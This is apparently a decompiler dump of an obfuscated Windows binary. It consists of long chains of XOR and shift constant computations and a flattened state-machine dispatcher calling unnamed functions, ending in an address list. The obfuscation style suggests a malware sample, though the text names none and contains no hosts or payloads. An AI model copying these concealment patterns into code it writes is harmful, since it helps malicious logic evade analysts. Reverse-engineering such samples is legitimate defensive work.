                                                                                                                                                            				_v268 = _v268 ^ 0x94371f3e;
                                                                                                                                                            				_v544 = 0x509d95;
                                                                                                                                                            				_v544 = _v544 >> 0xa;
                                                                                                                                                            				_v544 = _v544 >> 0xf;
                                                                                                                                                            				_v544 = _v544 >> 0xa;
                                                                                                                                                            				_v544 = _v544 ^ 0x0008d406;
                                                                                                                                                            				_v552 = 0x34f7be;
                                                                                                                                                            				_v552 = _v552 / _t1190;
                                                                                                                                                            				_v552 = _v552 >> 0x10;
                                                                                                                                                            				_v552 = _v552 >> 5;
                                                                                                                                                            				_v552 = _v552 ^ 0x0008c95b;
                                                                                                                                                            				_v404 = 0x94eb91;
                                                                                                                                                            				_v404 = _v404 ^ 0x41984e3b;
                                                                                                                                                            				_v404 = _v404 << 3;
                                                                                                                                                            				_v404 = _v404 ^ 0x08661611;
                                                                                                                                                            				_v220 = 0x500384;
                                                                                                                                                            				_v220 = _v220 ^ 0xbbdae5ed;
                                                                                                                                                            				_v220 = _v220 ^ 0xbb8779fc;
                                                                                                                                                            				_v448 = 0x89f4a;
                                                                                                                                                            				_t1207 = 0x66;
                                                                                                                                                            				_v448 = _v448 * 0x78;
                                                                                                                                                            				_v448 = _v448 / _t1313;
                                                                                                                                                            				_v448 = _v448 ^ 0x000df59a;
                                                                                                                                                            				_v292 = 0x19f8d0;
                                                                                                                                                            				_v292 = _v292 >> 0xf;
                                                                                                                                                            				_v292 = _v292 ^ 0x0007f69a;
                                                                                                                                                            				_v616 = 0x49d3c1;
                                                                                                                                                            				_v616 = _v616 | 0x94d46b10;
                                                                                                                                                            				_v616 = _v616 >> 0xe;
                                                                                                                                                            				_v616 = _v616 | 0x382c489e;
                                                                                                                                                            				_v616 = _v616 ^ 0x382cb35c;
                                                                                                                                                            				_v440 = 0x57429d;
                                                                                                                                                            				_v440 = _v440 << 0x10;
                                                                                                                                                            				_v440 = _v440 + 0x8d95;
                                                                                                                                                            				_v440 = _v440 ^ 0x429b4669;
                                                                                                                                                            				_v612 = 0x469ad0;
                                                                                                                                                            				_v612 = _v612 ^ 0xa9c1a766;
                                                                                                                                                            				_v612 = _v612 | 0x8fd1d886;
                                                                                                                                                            				_v612 = _v612 << 1;
                                                                                                                                                            				_v612 = _v612 ^ 0x5faedd57;
                                                                                                                                                            				_v244 = 0xe276bf;
                                                                                                                                                            				_v244 = _v244 * 0x1a;
                                                                                                                                                            				_v244 = _v244 ^ 0x170afa50;
                                                                                                                                                            				_v352 = 0x60bcf5;
                                                                                                                                                            				_v352 = _v352 + 0xf9c7;
                                                                                                                                                            				_v352 = _v352 ^ 0xebf612c1;
                                                                                                                                                            				_v352 = _v352 ^ 0xeb9276cf;
                                                                                                                                                            				_v488 = 0xa1517b;
                                                                                                                                                            				_v488 = _v488 / _t1207;
                                                                                                                                                            				_t1208 = 0x68;
                                                                                                                                                            				_v488 = _v488 * 0x65;
                                                                                                                                                            				_v488 = _v488 >> 0xc;
                                                                                                                                                            				_v488 = _v488 ^ 0x00034996;
                                                                                                                                                            				_v388 = 0x73cbfd;
                                                                                                                                                            				_v388 = _v388 << 5;
                                                                                                                                                            				_v388 = _v388 / _t1208;
                                                                                                                                                            				_v388 = _v388 ^ 0x002375e2;
                                                                                                                                                            				_v480 = 0x418d4e;
                                                                                                                                                            				_v480 = _v480 + 0xffffa3b5;
                                                                                                                                                            				_v480 = _v480 + 0x7686;
                                                                                                                                                            				_v480 = _v480 << 6;
                                                                                                                                                            				_v480 = _v480 ^ 0x106d4c13;
                                                                                                                                                            				_v380 = 0xc2a320;
                                                                                                                                                            				_t1209 = 0x12;
                                                                                                                                                            				_v380 = _v380 / _t1209;
                                                                                                                                                            				_t1210 = 0x3b;
                                                                                                                                                            				_v380 = _v380 * 0x3d;
                                                                                                                                                            				_v380 = _v380 ^ 0x02970ee8;
                                                                                                                                                            				_v272 = 0xffa302;
                                                                                                                                                            				_v272 = _v272 << 0xb;
                                                                                                                                                            				_v272 = _v272 ^ 0xfd1abd55;
                                                                                                                                                            				_v280 = 0x15da71;
                                                                                                                                                            				_v280 = _v280 | 0xb4bf3799;
                                                                                                                                                            				_v280 = _v280 ^ 0xb4b9b38f;
                                                                                                                                                            				_v364 = 0xb2440c;
                                                                                                                                                            				_v364 = _v364 >> 0xb;
                                                                                                                                                            				_v364 = _v364 ^ 0x4809a963;
                                                                                                                                                            				_v364 = _v364 ^ 0x4806c3ec;
                                                                                                                                                            				_v472 = 0xfa5982;
                                                                                                                                                            				_v472 = _v472 * 0x42;
                                                                                                                                                            				_v472 = _v472 | 0xea19613e;
                                                                                                                                                            				_v472 = _v472 + 0x3c8a;
                                                                                                                                                            				_v472 = _v472 ^ 0xea9293e6;
                                                                                                                                                            				_v464 = 0xd5ed68;
                                                                                                                                                            				_v464 = _v464 << 3;
                                                                                                                                                            				_v464 = _v464 << 0x10;
                                                                                                                                                            				_v464 = _v464 << 0xc;
                                                                                                                                                            				_v464 = _v464 ^ 0x00064bb9;
                                                                                                                                                            				_v240 = 0xe6b6f4;
                                                                                                                                                            				_v240 = _v240 + 0xffffaad8;
                                                                                                                                                            				_v240 = _v240 ^ 0x00e3249b;
                                                                                                                                                            				_v360 = 0x591b06;
                                                                                                                                                            				_v360 = _v360 / _t1210;
                                                                                                                                                            				_v360 = _v360 ^ 0x000e8e51;
                                                                                                                                                            				_v456 = 0xd9b586;
                                                                                                                                                            				_v456 = _v456 << 7;
                                                                                                                                                            				_t1211 = 0x77;
                                                                                                                                                            				_v456 = _v456 / _t1211;
                                                                                                                                                            				_v456 = _v456 ^ 0x2d3aa422;
                                                                                                                                                            				_v456 = _v456 ^ 0x2dd2b0e0;
                                                                                                                                                            				_v468 = 0xee071b;
                                                                                                                                                            				_t1212 = 0x17;
                                                                                                                                                            				_v468 = _v468 / _t1212;
                                                                                                                                                            				_v468 = _v468 + 0xffff215c;
                                                                                                                                                            				_t1213 = 0x1e;
                                                                                                                                                            				_v468 = _v468 / _t1213;
                                                                                                                                                            				_v468 = _v468 ^ 0x01343549;
                                                                                                                                                            				_v508 = 0x51d736;
                                                                                                                                                            				_v508 = _v508 ^ 0xe0f7e333;
                                                                                                                                                            				_v508 = _v508 ^ 0x46175d01;
                                                                                                                                                            				_v508 = _v508 << 0xb;
                                                                                                                                                            				_v508 = _v508 ^ 0x8b480710;
                                                                                                                                                            				_v332 = 0x8a6fa0;
                                                                                                                                                            				_v332 = _v332 << 4;
                                                                                                                                                            				_v332 = _v332 * 0x66;
                                                                                                                                                            				_v332 = _v332 ^ 0x72879c01;
                                                                                                                                                            				_v436 = 0x22afa8;
                                                                                                                                                            				_v436 = _v436 ^ 0xb7db44c6;
                                                                                                                                                            				_v436 = _v436 + 0x54fa;
                                                                                                                                                            				_v436 = _v436 ^ 0xb7fa4fc8;
                                                                                                                                                            				_v584 = 0x2b296e;
                                                                                                                                                            				_t833 =  &_v584; // 0x2b296e
                                                                                                                                                            				_t1214 = 0x7d;
                                                                                                                                                            				_t1314 = _v360;
                                                                                                                                                            				_v584 =  *_t833 * 0x69;
                                                                                                                                                            				_v584 = _v584 ^ 0x4f8ca6ed;
                                                                                                                                                            				_v584 = _v584 + 0xffff6423;
                                                                                                                                                            				_v584 = _v584 ^ 0x5e3ea256;
                                                                                                                                                            				_v564 = 0x8d053b;
                                                                                                                                                            				_t1191 = _v360;
                                                                                                                                                            				_v564 = _v564 * 0x58;
                                                                                                                                                            				_v564 = _v564 >> 0xa;
                                                                                                                                                            				_v564 = _v564 / _t1214;
                                                                                                                                                            				_v564 = _v564 ^ 0x000da371;
                                                                                                                                                            				_v208 = 0xe7280f;
                                                                                                                                                            				_v208 = _v208 << 4;
                                                                                                                                                            				_v208 = _v208 ^ 0x0e7f3b50;
                                                                                                                                                            				_v308 = 0xd716a5;
                                                                                                                                                            				_v308 = _v308 << 6;
                                                                                                                                                            				_v308 = _v308 ^ 0x35cb5d60;
                                                                                                                                                            				_v260 = 0x2bcd88;
                                                                                                                                                            				_t1215 = 0x69;
                                                                                                                                                            				_v260 = _v260 * 0x56;
                                                                                                                                                            				_v260 = _v260 ^ 0x0eb9ff90;
                                                                                                                                                            				_v536 = 0x561f85;
                                                                                                                                                            				_v536 = _v536 + 0x28c2;
                                                                                                                                                            				_v536 = _v536 ^ 0x7eb81cd4;
                                                                                                                                                            				_v536 = _v536 + 0xfffffcfb;
                                                                                                                                                            				_v536 = _v536 ^ 0x7eee24be;
                                                                                                                                                            				_v528 = 0xd9e61a;
                                                                                                                                                            				_v528 = _v528 | 0x5cf69c57;
                                                                                                                                                            				_v528 = _v528 / _t1215;
                                                                                                                                                            				_v528 = _v528 * 0x70;
                                                                                                                                                            				_v528 = _v528 ^ 0x6333db70;
                                                                                                                                                            				goto L1;
                                                                                                                                                            				do {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L1:
                                                                                                                                                            						_t1348 = _t1317 - 0x6397bd0;
                                                                                                                                                            						if(_t1348 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t1348 == 0) {
                                                                                                                                                            							E003866CA();
                                                                                                                                                            							_t1317 = 0x525d695;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						_t1349 = _t1317 - 0x3d71c3c;
                                                                                                                                                            						if(_t1349 > 0) {
                                                                                                                                                            							__eflags = _t1317 - 0x525d695;
                                                                                                                                                            							if(__eflags > 0) {
                                                                                                                                                            								__eflags = _t1317 - 0x53c3717;
                                                                                                                                                            								if(_t1317 == 0x53c3717) {
                                                                                                                                                            									_t1118 = E00381FFB();
                                                                                                                                                            									__eflags = _t1118;
                                                                                                                                                            									if(_t1118 == 0) {
                                                                                                                                                            										_t1125 = E00390056();
                                                                                                                                                            									}
                                                                                                                                                            									L27:
                                                                                                                                                            									_t1317 = 0xc4dcd;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t1317 - 0x56efd44;
                                                                                                                                                            								if(_t1317 == 0x56efd44) {
                                                                                                                                                            									E003895FA();
                                                                                                                                                            									_t1122 = E00381FFB();
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t1317 - 0x5d794ec;
                                                                                                                                                            								if(_t1317 == 0x5d794ec) {
                                                                                                                                                            									_t1317 = 0xd7f216f;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t1317 - 0x5dcd6da;
                                                                                                                                                            								if(_t1317 != 0x5dcd6da) {
                                                                                                                                                            									goto L109;
                                                                                                                                                            								}
                                                                                                                                                            								_t1125 = E0038C110(_v336,  &_v152, _v400, _v368);
                                                                                                                                                            								_t1317 = 0x6eeee91;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								_t1125 = E003759F2();
                                                                                                                                                            								__eflags = _t1125;
                                                                                                                                                            								if(_t1125 == 0) {
                                                                                                                                                            									L114:
                                                                                                                                                            									return _t1125;
                                                                                                                                                            								}
                                                                                                                                                            								_t1317 = 0x56efd44;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0x3fc5519;
                                                                                                                                                            							if(_t1317 == 0x3fc5519) {
                                                                                                                                                            								_v144 = E003820B0();
                                                                                                                                                            								_t1125 = E00381DDD(_v452, _t1152, _v636, _v224);
                                                                                                                                                            								_pop(_t1237);
                                                                                                                                                            								_v140 = _t1125;
                                                                                                                                                            								_t1317 = 0xa74297b;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0x42dc4f0;
                                                                                                                                                            							if(_t1317 == 0x42dc4f0) {
                                                                                                                                                            								_t1125 = _v468;
                                                                                                                                                            								_t1317 = 0x4cdd8ae;
                                                                                                                                                            								_v112 = _t1125;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0x4a24b69;
                                                                                                                                                            							if(_t1317 == 0x4a24b69) {
                                                                                                                                                            								_t1125 = E00380326();
                                                                                                                                                            								_t1317 = 0x8690ed6;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0x4cdd8ae;
                                                                                                                                                            							if(_t1317 != 0x4cdd8ae) {
                                                                                                                                                            								goto L109;
                                                                                                                                                            							}
                                                                                                                                                            							_t1125 = _v508;
                                                                                                                                                            							_t1317 = 0x5dcd6da;
                                                                                                                                                            							_v124 = _t1125;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t1349 == 0) {
                                                                                                                                                            							E00388519(_v244, _v352, _v188);
                                                                                                                                                            							L34:
                                                                                                                                                            							_t1317 = 0xe4333b3;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						_t1350 = _t1317 - 0x27d9d92;
                                                                                                                                                            						if(_t1350 > 0) {
                                                                                                                                                            							__eflags = _t1317 - 0x2a998d8;
                                                                                                                                                            							if(_t1317 == 0x2a998d8) {
                                                                                                                                                            								_t1124 = E00371A56( &_v180,  &_v84, _v572, _v516);
                                                                                                                                                            								__eflags = _t1124;
                                                                                                                                                            								if(_t1124 != 0) {
                                                                                                                                                            									_t1125 = _v28;
                                                                                                                                                            									__eflags = _t1125 - 8;
                                                                                                                                                            									if(_t1125 != 8) {
                                                                                                                                                            										__eflags = _t1125;
                                                                                                                                                            										if(_t1125 == 0) {
                                                                                                                                                            											L32:
                                                                                                                                                            											_t1317 = 0xa65551a;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										__eflags = _t1125 - 1;
                                                                                                                                                            										if(_t1125 != 1) {
                                                                                                                                                            											goto L27;
                                                                                                                                                            										}
                                                                                                                                                            										goto L32;
                                                                                                                                                            									}
                                                                                                                                                            									_t1317 = 0xc1a4fe5;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								_t1125 = E00380AE0(_v308, _v564);
                                                                                                                                                            								_pop(_t1237);
                                                                                                                                                            								_t1314 = _t1125;
                                                                                                                                                            								_t1191 = 0x5dcd6da;
                                                                                                                                                            								goto L27;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0x2cf0ed0;
                                                                                                                                                            							if(_t1317 == 0x2cf0ed0) {
                                                                                                                                                            								_t1125 = E0038CB5B(_v340, _v248, _v348, _v356);
                                                                                                                                                            								goto L114;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0x3250d84;
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								_v196 = E00387BA6( &_v192, _v596, __eflags, _v492, 0x371444);
                                                                                                                                                            								_v204 = E00387BA6( &_v200, _v316, __eflags, _v344, 0x3714b4);
                                                                                                                                                            								_t1130 = E00375361(_v460, _v524,  &_v196,  &_v204);
                                                                                                                                                            								_t1345 = _t1345 + 0x1c;
                                                                                                                                                            								asm("sbb esi, esi");
                                                                                                                                                            								_t1317 = ( ~_t1130 & 0xfa5ce13e) + 0xccbb739;
                                                                                                                                                            								E0037A8B0(_v376, _v204, _v424);
                                                                                                                                                            								_t1125 = E0037A8B0(_v580, _v196, _v328);
                                                                                                                                                            								goto L109;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0x3ace1b1;
                                                                                                                                                            							if(_t1317 != 0x3ace1b1) {
                                                                                                                                                            								goto L109;
                                                                                                                                                            							}
                                                                                                                                                            							_t1125 = E0038473C();
                                                                                                                                                            							_t1317 = 0xc245297;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t1350 == 0) {
                                                                                                                                                            							_t1141 = E00384116();
                                                                                                                                                            							__eflags = _t1141;
                                                                                                                                                            							if(_t1141 == 0) {
                                                                                                                                                            								_t1125 = E00381FFB();
                                                                                                                                                            								asm("sbb esi, esi");
                                                                                                                                                            								_t1317 = ( ~_t1125 & 0xf7888f1a) + 0xc245297;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t1125 = E00381FFB();
                                                                                                                                                            								asm("sbb esi, esi");
                                                                                                                                                            								_t1317 = ( ~_t1125 & 0x013fceb9) + 0xc7d9b3b;
                                                                                                                                                            							}
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t1317 == 0xc4dcd) {
                                                                                                                                                            							_t1125 = E00388519(_v440, _v612, _v180);
                                                                                                                                                            							_t1317 = 0x3d71c3c;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t1317 == 0x283259) {
                                                                                                                                                            							_t1125 = E003764E2(_v476, _v332, _v252,  &_v188, E00374E74(), _v232, _v620,  &_v180);
                                                                                                                                                            							_t1345 = _t1345 + 0x18;
                                                                                                                                                            							asm("sbb esi, esi");
                                                                                                                                                            							_t1317 = ( ~_t1125 & 0x0281667f) + 0x283259;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t1317 == 0x1b53ec1) {
                                                                                                                                                            							_t1125 = E003887D1();
                                                                                                                                                            							_v104 = _t1125;
                                                                                                                                                            							_t1317 = 0xfa2c753;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t1317 != 0x1f27ca8) {
                                                                                                                                                            							goto L109;
                                                                                                                                                            						}
                                                                                                                                                            						_t1125 = E003820BA();
                                                                                                                                                            						if(_t1125 == 0) {
                                                                                                                                                            							goto L114;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t1317 = 0xa7d0a44;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t1317 - 0xa7d0a44;
                                                                                                                                                            					if(__eflags > 0) {
                                                                                                                                                            						__eflags = _t1317 - 0xd7f216f;
                                                                                                                                                            						if(__eflags > 0) {
                                                                                                                                                            							__eflags = _t1317 - 0xdbd69f4;
                                                                                                                                                            							if(_t1317 == 0xdbd69f4) {
                                                                                                                                                            								_t1114 = E00389BCF();
                                                                                                                                                            								__eflags = _t1114;
                                                                                                                                                            								if(_t1114 != 0) {
                                                                                                                                                            									L85:
                                                                                                                                                            									_t1317 = 0x2cf0ed0;
                                                                                                                                                            									goto L1;
                                                                                                                                                            								}
                                                                                                                                                            								_t1317 = 0xc7d9b3b;
                                                                                                                                                            								goto L109;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0xe4333b3;
                                                                                                                                                            							if(_t1317 == 0xe4333b3) {
                                                                                                                                                            								__eflags = _t1314 - _v288;
                                                                                                                                                            								if(_t1314 == _v288) {
                                                                                                                                                            									L106:
                                                                                                                                                            									_t1317 = _t1191;
                                                                                                                                                            									goto L109;
                                                                                                                                                            								}
                                                                                                                                                            								_t1134 = E00374E74();
                                                                                                                                                            								_t1237 = _v480;
                                                                                                                                                            								_t1125 = E00378DC4(_v480, _v380, _v272, _v280, _t1134, _t1314);
                                                                                                                                                            								_t1345 = _t1345 + 0x10;
                                                                                                                                                            								__eflags = _t1125 - _v372;
                                                                                                                                                            								if(_t1125 == _v372) {
                                                                                                                                                            									_t1125 = E00376D24();
                                                                                                                                                            									goto L106;
                                                                                                                                                            								}
                                                                                                                                                            								_t1317 = 0x942db73;
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t1317 - 0xfa2c753;
                                                                                                                                                            							if(_t1317 != 0xfa2c753) {
                                                                                                                                                            								goto L109;
                                                                                                                                                            							}
                                                                                                                                                            							_t1125 = E0038D2CE(_t1237);
                                                                                                                                                            							_v172 = _t1125;
                                                                                                                                                            							_t1317 = 0x42dc4f0;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							_t1125 = E00387D48(_t1237, __eflags);
                                                                                                                                                            							__eflags = _t1125;
                                                                                                                                                            							if(_t1125 == 0) {
                                                                                                                                                            								goto L114;
                                                                                                                                                            							}
                                                                                                                                                            							_t1317 = 0x4a24b69;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t1317 - 0xb2497b0;
                                                                                                                                                            						if(_t1317 == 0xb2497b0) {
                                                                                                                                                            							_t1125 = E0037DFF3();
                                                                                                                                                            							_t1317 = 0x3250d84;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t1317 - 0xc1a4fe5;
                                                                                                                                                            						if(_t1317 == 0xc1a4fe5) {
                                                                                                                                                            							_t1125 = E00387DD5();
                                                                                                                                                            							goto L114;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t1317 - 0xc245297;
                                                                                                                                                            						if(_t1317 == 0xc245297) {
                                                                                                                                                            							_t1125 = E00388BE3();
                                                                                                                                                            							_t1317 = 0x6397bd0;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t1317 - 0xc7d9b3b;
                                                                                                                                                            						if(_t1317 != 0xc7d9b3b) {
                                                                                                                                                            							goto L109;
                                                                                                                                                            						}
                                                                                                                                                            						_t1125 = E003751BB();
                                                                                                                                                            						_t1317 = 0xb2497b0;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                            						_t1125 = E00389EEC();
                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                            						_t1317 = ( ~_t1125 & 0x03bbde3e) + 0x27d9d92;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t1317 - 0x8955e2f;
                                                                                                                                                            					if(__eflags > 0) {
                                                                                                                                                            						__eflags = _t1317 - 0x8c1c67e;
                                                                                                                                                            						if(_t1317 == 0x8c1c67e) {
                                                                                                                                                            							_t1125 = E00381EE7();
                                                                                                                                                            							goto L85;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t1317 - 0x942db73;
                                                                                                                                                            						if(_t1317 == 0x942db73) {
                                                                                                                                                            							_t1125 = E003791B0(_t1237);
                                                                                                                                                            							goto L114;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t1317 - 0xa65551a;
                                                                                                                                                            						if(_t1317 == 0xa65551a) {
                                                                                                                                                            							_t1125 = E0037B2C7(_v412, _v268,  &_v36);
                                                                                                                                                            							_pop(_t1237);
                                                                                                                                                            							__eflags = _t1125;
                                                                                                                                                            							if(_t1125 == 0) {
                                                                                                                                                            								_t1125 = _v28;
                                                                                                                                                            								__eflags = _t1125;
                                                                                                                                                            								if(_t1125 == 0) {
                                                                                                                                                            									_t1314 = E00380AE0(_v260, _v208);
                                                                                                                                                            									_t1125 = _v28;
                                                                                                                                                            									_pop(_t1237);
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t1125 - 1;
                                                                                                                                                            								if(_t1125 == 1) {
                                                                                                                                                            									_t1125 = E00380AE0(_v528, _v536);
                                                                                                                                                            									_pop(_t1237);
                                                                                                                                                            									_t1314 = _t1125;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t1314 = _v560;
                                                                                                                                                            							}
                                                                                                                                                            							_t1191 = 0x5dcd6da;
                                                                                                                                                            							_t1317 = 0x53c3717;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t1317 - 0xa74297b;
                                                                                                                                                            						if(_t1317 != 0xa74297b) {
                                                                                                                                                            							goto L109;
                                                                                                                                                            						}
                                                                                                                                                            						_t1125 = E003775F1();
                                                                                                                                                            						_v100 = _t1125;
                                                                                                                                                            						_t1317 = 0x1b53ec1;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                            						_t1125 = E0038E1D4();
                                                                                                                                                            						__eflags = _t1125;
                                                                                                                                                            						if(_t1125 == 0) {
                                                                                                                                                            							goto L114;
                                                                                                                                                            						}
                                                                                                                                                            						_t1317 = 0x1f27ca8;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t1317 - 0x6eeee91;
                                                                                                                                                            					if(_t1317 == 0x6eeee91) {
                                                                                                                                                            						_t1237 = _v276;
                                                                                                                                                            						_t1125 = E00372251(_v276,  &_v188,  &_v172, _v420, _v428);
                                                                                                                                                            						_t1345 = _t1345 + 0xc;
                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                            						_t1317 = ( ~_t1125 & 0xfc51161d) + 0x3d71c3c;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t1317 - 0x7289877;
                                                                                                                                                            					if(_t1317 == 0x7289877) {
                                                                                                                                                            						E0038E1D4();
                                                                                                                                                            						_t1191 = 0x3fc5519;
                                                                                                                                                            						_t1125 = E00380AE0(_v584, _v436);
                                                                                                                                                            						_t1314 = _t1125;
                                                                                                                                                            						goto L34;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t1317 - 0x77c68ce;
                                                                                                                                                            					if(_t1317 == 0x77c68ce) {
                                                                                                                                                            						_t1125 = E00385CC4();
                                                                                                                                                            						_t1317 = 0x8c1c67e;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t1317 - 0x8690ed6;
                                                                                                                                                            					if(_t1317 != 0x8690ed6) {
                                                                                                                                                            						goto L109;
                                                                                                                                                            					}
                                                                                                                                                            					_t1125 = E0038044F();
                                                                                                                                                            					__eflags = _t1125;
                                                                                                                                                            					if(_t1125 == 0) {
                                                                                                                                                            						goto L114;
                                                                                                                                                            					}
                                                                                                                                                            					_t1317 = 0x8955e2f;
                                                                                                                                                            					goto L1;
                                                                                                                                                            					L109:
                                                                                                                                                            					__eflags = _t1317 - 0xccbb739;
                                                                                                                                                            				} while (_t1317 != 0xccbb739);
                                                                                                                                                            				goto L114;
                                                                                                                                                            			}
                                                                                                                                                            0x0038281b
                                                                                                                                                            0x00382826
                                                                                                                                                            0x00382831
                                                                                                                                                            0x0038283c
                                                                                                                                                            0x00382847
                                                                                                                                                            0x00382852
                                                                                                                                                            0x0038285d
                                                                                                                                                            0x00382865
                                                                                                                                                            0x00382870
                                                                                                                                                            0x0038287b
                                                                                                                                                            0x00382886
                                                                                                                                                            0x00382891
                                                                                                                                                            0x0038289c
                                                                                                                                                            0x003828a4
                                                                                                                                                            0x003828ac
                                                                                                                                                            0x003828bc
                                                                                                                                                            0x003828c0
                                                                                                                                                            0x003828c8
                                                                                                                                                            0x003828d8
                                                                                                                                                            0x003828dc
                                                                                                                                                            0x003828e4
                                                                                                                                                            0x003828ec
                                                                                                                                                            0x003828f4
                                                                                                                                                            0x003828fc
                                                                                                                                                            0x00382901
                                                                                                                                                            0x00382906
                                                                                                                                                            0x0038290e
                                                                                                                                                            0x00382916
                                                                                                                                                            0x00382928
                                                                                                                                                            0x0038292d
                                                                                                                                                            0x00382936
                                                                                                                                                            0x00382941
                                                                                                                                                            0x0038294c
                                                                                                                                                            0x0038295f
                                                                                                                                                            0x00382960
                                                                                                                                                            0x00382967
                                                                                                                                                            0x00382972
                                                                                                                                                            0x00382985
                                                                                                                                                            0x0038298c
                                                                                                                                                            0x00382997
                                                                                                                                                            0x003829ab
                                                                                                                                                            0x003829b2
                                                                                                                                                            0x003829ba
                                                                                                                                                            0x003829c5
                                                                                                                                                            0x003829d0
                                                                                                                                                            0x003829e7
                                                                                                                                                            0x003829ea
                                                                                                                                                            0x003829f1
                                                                                                                                                            0x003829fc
                                                                                                                                                            0x00382a07
                                                                                                                                                            0x00382a12
                                                                                                                                                            0x00382a1d
                                                                                                                                                            0x00382a28
                                                                                                                                                            0x00382a33
                                                                                                                                                            0x00382a3b
                                                                                                                                                            0x00382a46
                                                                                                                                                            0x00382a51
                                                                                                                                                            0x00382a64
                                                                                                                                                            0x00382a6b
                                                                                                                                                            0x00382a72
                                                                                                                                                            0x00382a7d
                                                                                                                                                            0x00382a93
                                                                                                                                                            0x00382a9a
                                                                                                                                                            0x00382aa5
                                                                                                                                                            0x00382ab8
                                                                                                                                                            0x00382abb
                                                                                                                                                            0x00382ac2
                                                                                                                                                            0x00382aca
                                                                                                                                                            0x00382ad5
                                                                                                                                                            0x00382add
                                                                                                                                                            0x00382ae2
                                                                                                                                                            0x00382aea
                                                                                                                                                            0x00382af2
                                                                                                                                                            0x00382b05
                                                                                                                                                            0x00382b0c
                                                                                                                                                            0x00382b17
                                                                                                                                                            0x00382b1f
                                                                                                                                                            0x00382b2a
                                                                                                                                                            0x00382b35
                                                                                                                                                            0x00382b3d
                                                                                                                                                            0x00382b48
                                                                                                                                                            0x00382b53
                                                                                                                                                            0x00382b5a
                                                                                                                                                            0x00382b65
                                                                                                                                                            0x00382b70
                                                                                                                                                            0x00382b83
                                                                                                                                                            0x00382b8a
                                                                                                                                                            0x00382ba0
                                                                                                                                                            0x00382ba7
                                                                                                                                                            0x00382bb2
                                                                                                                                                            0x00382bba
                                                                                                                                                            0x00382bc2
                                                                                                                                                            0x00382bca
                                                                                                                                                            0x00382bcf
                                                                                                                                                            0x00382bd7
                                                                                                                                                            0x00382bea
                                                                                                                                                            0x00382beb
                                                                                                                                                            0x00382bfa
                                                                                                                                                            0x00382c01
                                                                                                                                                            0x00382c08
                                                                                                                                                            0x00382c13
                                                                                                                                                            0x00382c1e
                                                                                                                                                            0x00382c26
                                                                                                                                                            0x00382c31
                                                                                                                                                            0x00382c3c
                                                                                                                                                            0x00382c47
                                                                                                                                                            0x00382c58
                                                                                                                                                            0x00382c5f
                                                                                                                                                            0x00382c6c
